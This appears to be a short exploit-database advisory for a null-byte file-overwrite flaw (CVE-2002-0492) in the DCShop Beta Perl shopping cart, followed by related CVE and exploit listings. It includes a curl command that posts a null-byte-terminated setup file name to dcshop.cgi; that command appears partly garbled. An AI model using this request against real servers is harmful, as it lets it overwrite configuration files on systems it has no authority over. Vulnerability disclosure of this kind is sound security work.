source: http://www.securityfocus.com/bid/4356/info DCShop Beta is a freely available shopping cart system, written in Perl. It will run on most Unix and Linux variants, as well as Microsoft Windows operating systems. It is possible to overwrite setup files (*.setup) by submitting attacker-supplied form data followed by a null character (%00). The attacker must use the POST method to submit data that is content-type multipart/form-data compliant. curl -F email@example.com http://host/cgi-bin/dcshop.cgi where test.txt contains databasename.setup[nullbyte].
Related ExploitsTrying to match CVEs (1): CVE-2002-0492
Trying to match OSVDBs (1): 10433
Other Possible E-DB Search Terms: DCShop Beta 1.0, DCShop Beta
|2001-06-18||20938||DC Scripts DCShop Beta 1.0 02 - File Disclosure (1)||Peter Helms|
|2001-06-18||20939||DC Scripts DCShop Beta 1.0 02 - File Disclosure (2)||Peter Helms|